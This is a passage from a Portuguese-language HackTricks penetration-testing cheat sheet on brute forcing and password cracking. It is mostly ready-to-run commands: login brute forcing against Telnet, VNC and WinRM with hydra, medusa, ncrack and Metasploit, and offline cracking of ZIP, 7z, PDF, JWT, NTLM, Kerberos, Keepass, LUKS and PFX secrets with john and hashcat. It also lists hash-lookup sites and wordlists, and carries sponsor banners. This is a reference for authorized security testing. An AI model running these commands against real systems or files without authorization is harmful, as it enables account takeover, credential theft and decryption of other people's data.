Telnet é um protocolo de rede que permite a comunicação com um dispositivo remoto. É comumente usado em testes de penetração para tentativas de login por força bruta.
|
||
```bash
|
||
hydra -l root -P passwords.txt [-t 32] <IP> telnet
|
||
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
|
||
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
|
||
|
||
legba telnet \
|
||
--username admin \
|
||
--password wordlists/passwords.txt \
|
||
--target localhost:23 \
|
||
--telnet-user-prompt "login: " \
|
||
--telnet-pass-prompt "Password: " \
|
||
--telnet-prompt ":~$ " \
|
||
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin
|
||
```
|
||
### VNC
|
||
|
||
#### Brute Force
|
||
|
||
Brute force attacks against VNC servers are common due to the protocol's lack of built-in security features. Attackers can use tools like Hydra or Medusa to automate the process of trying different username and password combinations until the correct one is found. It is essential to use strong, unique credentials and consider additional security measures such as IP whitelisting or VPNs to protect VNC servers from brute force attacks.
|
||
```bash
|
||
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc
|
||
medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc
|
||
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
|
||
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0
|
||
use auxiliary/scanner/vnc/vnc_login
|
||
nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt <IP>
|
||
legba vnc --target localhost:5901 --password data/passwords.txt
|
||
|
||
#Metasploit
|
||
use auxiliary/scanner/vnc/vnc_login
|
||
set RHOSTS <ip>
|
||
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
|
||
```
|
||
### Winrm
|
||
```bash
|
||
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
|
||
```
|
||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
\
|
||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir e **automatizar fluxos de trabalho** facilmente com as ferramentas comunitárias mais avançadas do mundo.\
|
||
Acesse hoje mesmo:
|
||
|
||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||
|
||
## Local
|
||
|
||
### Bancos de dados de quebra online
|
||
|
||
* [~~http://hashtoolkit.com/reverse-hash?~~](http://hashtoolkit.com/reverse-hash?) (MD5 & SHA1)
|
||
* [https://shuck.sh/get-shucking.php](https://shuck.sh/get-shucking.php) (MSCHAPv2/PPTP-VPN/NetNTLMv1 com/sem ESS/SSP e com qualquer valor de desafio)
|
||
* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) (Hashes, capturas WPA2 e arquivos MSOffice, ZIP, PDF...)
|
||
* [https://crackstation.net/](https://crackstation.net) (Hashes)
|
||
* [https://md5decrypt.net/](https://md5decrypt.net) (MD5)
|
||
* [https://gpuhash.me/](https://gpuhash.me) (Hashes e hashes de arquivos)
|
||
* [https://hashes.org/search.php](https://hashes.org/search.php) (Hashes)
|
||
* [https://www.cmd5.org/](https://www.cmd5.org) (Hashes)
|
||
* [https://hashkiller.co.uk/Cracker](https://hashkiller.co.uk/Cracker) (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512)
|
||
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) (MD5)
|
||
* [http://reverse-hash-lookup.online-domain-tools.com/](http://reverse-hash-lookup.online-domain-tools.com)
|
||
|
||
Verifique isso antes de tentar fazer força bruta em um Hash.
|
||
|
||
### ZIP
|
||
```bash
|
||
#sudo apt-get install fcrackzip
|
||
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
|
||
```
|
||
|
||
```bash
|
||
zip2john file.zip > zip.john
|
||
john zip.john
|
||
```
|
||
|
||
```bash
|
||
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
|
||
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
|
||
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
|
||
```
|
||
#### Ataque de força bruta de texto simples zip conhecido
|
||
|
||
Você precisa saber o **texto simples** (ou parte do texto simples) **de um arquivo contido dentro** do zip criptografado. Você pode verificar **os nomes de arquivos e o tamanho dos arquivos contidos dentro** de um zip criptografado executando: **`7z l encrypted.zip`**\
|
||
Baixe o [**bkcrack**](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0) na página de lançamentos.
|
||
```bash
|
||
# You need to create a zip file containing only the file that is inside the encrypted zip
|
||
zip plaintext.zip plaintext.file
|
||
|
||
./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
|
||
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
|
||
# With that key you can create a new zip file with the content of encrypted.zip
|
||
# but with a different pass that you set (so you can decrypt it)
|
||
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
|
||
unzip unlocked.zip #User new_pwd as password
|
||
```
|
||
### 7z
|
||
|
||
### Brute Force Attack
|
||
|
||
Um ataque de força bruta é uma técnica de hacking que envolve tentar todas as combinações possíveis de senhas até encontrar a correta. Isso pode ser feito de forma automatizada usando ferramentas como o `7z`.
|
||
```bash
|
||
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
|
||
```
|
||
|
||
```bash
|
||
#Download and install requirements for 7z2john
|
||
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
|
||
apt-get install libcompress-raw-lzma-perl
|
||
./7z2john.pl file.7z > 7zhash.john
|
||
```
|
||
### PDF
|
||
|
||
#### Brute Force
|
||
|
||
Brute force attacks consist of systematically checking all possible keys or passwords until the correct one is found. This method is usually used when the password is unknown and there is no other way to obtain it. Brute force attacks can be time-consuming but are often effective.
|
||
|
||
##### Tools
|
||
|
||
- **Hydra**: A popular tool for performing brute force attacks. It supports multiple protocols and services.
|
||
- **Medusa**: Similar to Hydra, Medusa is a speedy, parallel, and modular login brute-forcer.
|
||
- **Ncrack**: A high-speed network authentication cracking tool. It was designed for large-scale network audits.
|
||
- **John the Ripper**: A widely used password cracker. It can perform both dictionary and brute force attacks.
|
||
|
||
##### Techniques
|
||
|
||
- **Dictionary Attack**: Involves using a predefined list of passwords to try to crack a password.
|
||
- **Hybrid Attack**: Combines a dictionary attack with a brute force attack.
|
||
- **Rainbow Table Attack**: Uses precomputed tables to crack passwords.
|
||
|
||
##### Prevention
|
||
|
||
- Use complex and unique passwords.
|
||
- Implement account lockout policies.
|
||
- Monitor and log failed login attempts.
|
||
- Use multi-factor authentication when possible.
|
||
```bash
|
||
apt-get install pdfcrack
|
||
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
|
||
#pdf2john didn't work well, john didn't know which hash type was
|
||
# To permanently decrypt the pdf
|
||
sudo apt-get install qpdf
|
||
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
|
||
```
|
||
### Senha do Proprietário do PDF
|
||
|
||
Para quebrar uma senha de proprietário de PDF, verifique isso: [https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/)
|
||
|
||
### JWT
|
||
```bash
|
||
git clone https://github.com/Sjord/jwtcrack.git
|
||
cd jwtcrack
|
||
|
||
#Bruteforce using crackjwt.py
|
||
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
|
||
|
||
#Bruteforce using john
|
||
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
|
||
john jwt.john #It does not work with Kali-John
|
||
```
|
||
### Quebra de NTLM
|
||
```bash
|
||
Format:USUARIO:ID:HASH_LM:HASH_NT:::
|
||
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
|
||
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
|
||
```
|
||
### Keepass
|
||
```bash
|
||
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
|
||
keepass2john file.kdbx > hash #The keepass is only using password
|
||
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
|
||
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
|
||
john --wordlist=/usr/share/wordlists/rockyou.txt hash
|
||
```
|
||
### Keberoasting
|
||
```bash
|
||
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
|
||
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
|
||
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
|
||
```
|
||
### Imagem Lucks
|
||
|
||
#### Método 1
|
||
|
||
Instalação: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks)
|
||
```bash
|
||
bruteforce-luks -f ./list.txt ./backup.img
|
||
cryptsetup luksOpen backup.img mylucksopen
|
||
ls /dev/mapper/ #You should find here the image mylucksopen
|
||
mount /dev/mapper/mylucksopen /mnt
|
||
```
|
||
#### Método 2
|
||
```bash
|
||
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
|
||
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
|
||
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
|
||
cryptsetup luksOpen backup.img mylucksopen
|
||
ls /dev/mapper/ #You should find here the image mylucksopen
|
||
mount /dev/mapper/mylucksopen /mnt
|
||
```
|
||
Outro tutorial de BF Luks: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1)
|
||
|
||
### Mysql
|
||
```bash
|
||
#John hash format
|
||
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
|
||
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
|
||
```
|
||
### Chave privada PGP/GPG
|
||
```bash
|
||
gpg2john private_pgp.key #This will generate the hash and save it in a file
|
||
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
|
||
```
|
||
### Cisco
|
||
|
||
<figure><img src="../.gitbook/assets/image (660).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
### Chave Mestra DPAPI
|
||
|
||
Use [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py) e depois o john
|
||
|
||
### Coluna Protegida por Senha no Open Office
|
||
|
||
Se você tiver um arquivo xlsx com uma coluna protegida por senha, você pode desprotegê-la:
|
||
|
||
* **Faça o upload para o Google Drive** e a senha será removida automaticamente
|
||
* Para **removê-la** **manualmente**:
|
||
```bash
|
||
unzip file.xlsx
|
||
grep -R "sheetProtection" ./*
|
||
# Find something like: <sheetProtection algorithmName="SHA-512"
|
||
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
|
||
# Remove that line and rezip the file
|
||
zip -r file.xls .
|
||
```
|
||
### Certificados PFX
|
||
```bash
|
||
# From https://github.com/Ridter/p12tool
|
||
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
|
||
# From https://github.com/crackpkcs12/crackpkcs12
|
||
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
|
||
```
|
||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
\
|
||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir e **automatizar fluxos de trabalho** facilmente, alimentados pelas ferramentas comunitárias **mais avançadas do mundo**.\
|
||
Acesse hoje mesmo:
|
||
|
||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||
|
||
## Ferramentas
|
||
|
||
**Exemplos de Hash:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes)
|
||
|
||
### Identificador de Hash
|
||
```bash
|
||
hash-identifier
|
||
> <HASH>
|
||
```
|
||
### Listas de Palavras
|
||
|
||
* **Rockyou**
|
||
* [**Probable-Wordlists**](https://github.com/berzerk0/Probable-Wordlists)
|
||
* [**Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/wordlists)
|
||
* [**Seclists - Passwords**](https://github.com/danielmiessler/SecLists/tree/master/Passwords)
|
||
|
||
### **Ferramentas de Geração de Listas de Palavras**
|
||
|
||
* [**kwprocessor**](https://github.com/hashcat/kwprocessor)**:** Gerador avançado de sequências de teclado com caracteres base configuráveis, mapa de teclas e rotas.
|
||
```bash
|
||
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt
|
||
```
|
||
### Mutação de John
|
||
|
||
Leia _**/etc/john/john.conf**_ e configure-o
|
||
```bash
|
||
john --wordlist=words.txt --rules --stdout > w_mutated.txt
|
||
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
|
||
```
|
||
### Hashcat
|
||
|
||
#### Ataques do Hashcat
|
||
|
||
* **Ataque de lista de palavras** (`-a 0`) com regras
|
||
|
||
**Hashcat** já vem com uma **pasta contendo regras** mas você pode encontrar [**outras regras interessantes aqui**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules).
|
||
```
|
||
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
|
||
```
|
||
* **Ataque de combinação de listas de palavras**
|
||
|
||
É possível **combinar 2 listas de palavras em 1** com o hashcat.\
|
||
Se a lista 1 contiver a palavra **"hello"** e a segunda contiver 2 linhas com as palavras **"world"** e **"earth"**. As palavras `helloworld` e `helloearth` serão geradas.
|
||
```bash
|
||
# This will combine 2 wordlists
|
||
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
|
||
|
||
# Same attack as before but adding chars in the newly generated words
|
||
# In the previous example this will generate:
|
||
## hello-world!
|
||
## hello-earth!
|
||
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
|
||
```
|
||
* **Ataque de máscara** (`-a 3`)
|
||
```bash
|
||
# Mask attack with simple mask
|
||
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
|
||
|
||
hashcat --help #will show the charsets and are as follows
|
||
? | Charset
|
||
===+=========
|
||
l | abcdefghijklmnopqrstuvwxyz
|
||
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
|
||
d | 0123456789
|
||
h | 0123456789abcdef
|
||
H | 0123456789ABCDEF
|
||
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
|
||
a | ?l?u?d?s
|
||
b | 0x00 - 0xff
|
||
|
||
# Mask attack declaring custom charset
|
||
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
|
||
## -1 ?d?s defines a custom charset (digits and specials).
|
||
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.
|
||
|
||
# Mask attack with variable password length
|
||
## Create a file called masks.hcmask with this content:
|
||
?d?s,?u?l?l?l?l?1
|
||
?d?s,?u?l?l?l?l?l?1
|
||
?d?s,?u?l?l?l?l?l?l?1
|
||
?d?s,?u?l?l?l?l?l?l?l?1
|
||
?d?s,?u?l?l?l?l?l?l?l?l?1
|
||
## Use it to crack the password
|
||
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
|
||
```
|
||
* Ataque de Wordlist + Máscara (`-a 6`) / Ataque de Máscara + Wordlist (`-a 7`)
|
||
```bash
|
||
# Mask numbers will be appended to each word in the wordlist
|
||
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
|
||
|
||
# Mask numbers will be prepended to each word in the wordlist
|
||
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
|
||
```
|
||
#### Modos do Hashcat
|
||
```bash
|
||
hashcat --example-hashes | grep -B1 -A2 "NTLM"
|
||
```
|
||
Quebrando Hashes do Linux - arquivo /etc/shadow
|
||
```
|
||
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
|
||
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
|
||
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
|
||
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
|
||
```
|
||
Quebrando Hashes do Windows
|
||
```
|
||
3000 | LM | Operating-Systems
|
||
1000 | NTLM | Operating-Systems
|
||
```
|
||
# Quebra de Hashes de Aplicativos Comuns
|
||
|
||
Ao realizar testes de penetração, é comum encontrar hashes de senhas em aplicativos e sistemas. Para tentar quebrar esses hashes e obter as senhas originais, uma técnica comum é o ataque de força bruta. Nesse tipo de ataque, o hacker tenta todas as combinações possíveis de caracteres até encontrar a senha correta que corresponde ao hash.
|
||
|
||
Existem várias ferramentas disponíveis que podem ser usadas para realizar ataques de força bruta em hashes de senhas. Alguns exemplos populares incluem o Hashcat, John the Ripper e o Hydra. Essas ferramentas são altamente configuráveis e podem ser ajustadas para lidar com diferentes tipos de hashes e algoritmos de criptografia.
|
||
|
||
É importante ressaltar que a quebra de hashes por força bruta pode ser um processo demorado, especialmente se as senhas forem complexas e longas. Além disso, é fundamental garantir que esse tipo de atividade seja realizada apenas em sistemas e aplicativos nos quais você tenha permissão explícita para testar a segurança.
|
||
```
|
||
900 | MD4 | Raw Hash
|
||
0 | MD5 | Raw Hash
|
||
5100 | Half MD5 | Raw Hash
|
||
100 | SHA1 | Raw Hash
|
||
10800 | SHA-384 | Raw Hash
|
||
1400 | SHA-256 | Raw Hash
|
||
1700 | SHA-512 | Raw Hash
|
||
```
|
||
<details>
|
||
|
||
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
Outras maneiras de apoiar o HackTricks:
|
||
|
||
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
||
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
||
|
||
</details>
|
||
|
||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
\
|
||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir e **automatizar fluxos de trabalho** facilmente com as ferramentas comunitárias **mais avançadas** do mundo.\
|
||
Acesse hoje:
|
||
|
||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|